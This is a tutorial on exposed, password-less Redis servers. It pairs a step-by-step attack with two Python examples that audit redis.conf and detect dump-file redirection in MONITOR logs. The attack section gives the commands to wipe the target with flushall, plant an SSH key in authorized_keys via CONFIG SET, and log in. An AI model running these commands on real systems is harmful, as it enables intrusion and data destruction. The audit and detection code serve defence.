Redis is an open-source data structure store that can be used as an in-memory distributed database, message broker or cache.
Since it is designed to be accessed inside trusted environments, it should not be exposed on the Internet.
Redis instances are often bound to a public interface and have no password authentication at all.
Whether or not Redis runs as root, attackers can write an SSH public key file into the root account and then log directly on to the victim server through SSH.
This may allow attackers to gain server privileges and delete or steal data.
Redis is often configured to be accessible anonymously; in that case no username or password is needed. Connecting to the Redis service and running the info command returns a lot of information about the server: the OS it runs on, connected clients, memory usage and more.
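The exposure described above comes down to a handful of redis.conf directives: a bind address that is not loopback (or no bind line at all), protected-mode switched off, no requirepass, and the CONFIG command left available to every client. The following added example (not code from the original post) audits a redis.conf text for exactly those conditions and shows the weak configuration beside a hardened one. Both configurations are constructed samples, and the requirepass value in the hardened one is a placeholder to be replaced with a long random secret.

```python
"""Audit redis.conf for the exposure conditions that make an anonymous
write to the persistence file possible. Added example; the sample
configurations below are constructed for illustration."""
import shlex

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed sample: the weak setup the post describes (public, no auth).
WEAK_CONF = """
bind 0.0.0.0
port 6379
protected-mode no
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed sample: a hardened setup. The password is a placeholder.
HARDENED_CONF = """
bind 127.0.0.1 -::1
port 6379
protected-mode yes
requirepass CHANGE_ME_to_a_long_random_secret
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
dbfilename dump.rdb
"""


def parse_conf(text: str) -> dict[str, list[list[str]]]:
    """Parse redis.conf into {directive: [args, ...]}; directives may repeat."""
    directives: dict[str, list[list[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)  # redis.conf uses shell-style quoting
        directives.setdefault(tokens[0].lower(), []).append(tokens[1:])
    return directives


def bind_is_public(conf: dict) -> bool:
    """True if Redis would listen on a non-loopback interface."""
    binds = conf.get("bind")
    if not binds:
        return True  # no bind directive: Redis listens on all interfaces
    # The last bind line wins; a leading '-' marks an optional address.
    return any(addr.lstrip("-") not in LOOPBACK for addr in binds[-1])


def has_auth(conf: dict) -> bool:
    """True if a non-empty requirepass is set (ACL 'user' lines not considered)."""
    pw = conf.get("requirepass")
    return bool(pw and pw[-1] and pw[-1][0])


def protected_mode_on(conf: dict) -> bool:
    """protected-mode defaults to yes when absent."""
    val = conf.get("protected-mode")
    return (val[-1][0].lower() if val and val[-1] else "yes") == "yes"


def config_command_disabled(conf: dict) -> bool:
    """True if CONFIG is renamed (to "" it is removed entirely)."""
    for args in conf.get("rename-command", []):
        if len(args) == 2 and args[0].upper() == "CONFIG" and args[1].upper() != "CONFIG":
            return True
    return False


def audit(text: str) -> list[str]:
    """Return one finding per weak setting; an empty list means all checks pass."""
    conf = parse_conf(text)
    findings = []
    if bind_is_public(conf):
        findings.append("bind: Redis listens on a non-loopback interface")
    if not protected_mode_on(conf):
        findings.append("protected-mode: disabled")
    if not has_auth(conf):
        findings.append("requirepass: no password set, anonymous access allowed")
    if not config_command_disabled(conf):
        findings.append("rename-command: CONFIG is available to every client")
    return findings


def is_remotely_exploitable(text: str) -> bool:
    """Unauthenticated clients from other hosts can reach this instance.

    Protected mode only blocks external clients when there is no bind
    directive and no password, so an explicit public bind defeats it."""
    conf = parse_conf(text)
    if has_auth(conf):
        return False
    if conf.get("bind"):
        return bind_is_public(conf)
    return not protected_mode_on(conf)


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}] remotely exploitable: {is_remotely_exploitable(text)}")
        for finding in audit(text):
            print("  -", finding)
```

Run it against a real /etc/redis/redis.conf by passing the file's contents to audit(); a non-empty result is the list of settings to change before the instance is reachable from anything but localhost.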
On our machine (the attacker machine) we need to install the Redis tools:
sudo apt-get install redis-tools
We are going to create new SSH keys, so we need to be inside our ~/.ssh folder:
$ ssh-keygen -t rsa
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
Now test.txt is just our public key with blank lines before and after it. We can write it into Redis memory using redis-cli:
$ redis-cli -h 192.168.1.15 flushall
$ cat test.txt | redis-cli -h 192.168.1.15 -x set keyz
Now we dump the memory contents into the authorized_keys file:
$ redis-cli -h 192.168.1.15
192.168.1.15:6379> config get dir
192.168.1.15:6379> config set dir "/var/lib/redis/.ssh"
192.168.1.15:6379> config get dbfilename
192.168.1.15:6379> config set dbfilename "authorized_keys"
The last step is to SSH to the target machine:
$ ssh -i id_rsa email@example.com
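The sequence above leaves a distinctive trace on the server side: a single client rewrites both the persistence directory and the dump filename through CONFIG SET. Redis's MONITOR command streams every executed command in the form `<timestamp> [<db> <ip:port>] "cmd" "arg" ...`, and that stream is where such changes can be spotted. The following added example (not part of the original post) parses MONITOR-style lines and raises an alert for each CONFIG SET of dir or dbfilename, plus a combined alert once one client has changed both. The log lines are constructed samples modelled on the commands shown on this page.

```python
"""Detect persistence-file redirection in Redis MONITOR output.
Added example; the sample lines are constructed, not captured."""
import re
import shlex

# MONITOR line layout: "<unix ts> [<db> <client addr>] "cmd" "arg" ..."
MONITOR_LINE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<cmd>.*)$'
)

# Parameters whose change via CONFIG SET redirects the RDB dump.
WATCHED = {("config", "set", "dir"), ("config", "set", "dbfilename")}

# Constructed sample resembling what MONITOR shows during the steps above.
SAMPLE_MONITOR = """\
1700000000.000001 [0 192.168.1.20:51234] "info"
1700000000.100002 [0 192.168.1.20:51234] "flushall"
1700000000.200003 [0 192.168.1.20:51234] "set" "keyz" "<key material>"
1700000000.300004 [0 192.168.1.20:51234] "config" "get" "dir"
1700000000.400005 [0 192.168.1.20:51234] "config" "set" "dir" "/var/lib/redis/.ssh"
1700000000.500006 [0 192.168.1.20:51234] "config" "set" "dbfilename" "authorized_keys"
1700000000.600007 [0 127.0.0.1:40000] "get" "session:42"
"""


def parse_monitor_line(line: str):
    """Return {'ts', 'client', 'args'} or None for lines that are not MONITOR output."""
    m = MONITOR_LINE.match(line.strip())
    if not m:
        return None
    args = shlex.split(m.group("cmd"))  # MONITOR quotes each argument
    # Command, subcommand and parameter name are case-insensitive; values are not.
    norm = [a.lower() for a in args[:3]] + args[3:]
    return {"ts": float(m.group("ts")), "client": m.group("client"), "args": norm}


def detect(lines) -> list[str]:
    """Scan MONITOR lines and return alerts, in order of occurrence."""
    alerts: list[str] = []
    changed: dict[str, set[str]] = {}  # client -> parameters it rewrote
    for line in lines:
        ev = parse_monitor_line(line)
        if ev is None:
            continue
        args = ev["args"]
        if len(args) >= 4 and tuple(args[:3]) in WATCHED:
            param, value = args[2], args[3]
            alerts.append(f"{ev['client']} CONFIG SET {param} -> {value!r}")
            seen = changed.setdefault(ev["client"], set())
            seen.add(param)
            if seen == {"dir", "dbfilename"}:
                alerts.append(
                    f"{ev['client']} rewrote both dir and dbfilename: "
                    "RDB dump redirected to an arbitrary file"
                )
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_MONITOR.splitlines()):
        print("ALERT:", alert)
```

In production the same function can be fed from `redis-cli MONITOR` piped through a log shipper; MONITOR has a measurable performance cost, so on busy instances the preferred fix remains the configuration side (loopback bind, requirepass, CONFIG renamed), with this detection as the safety net.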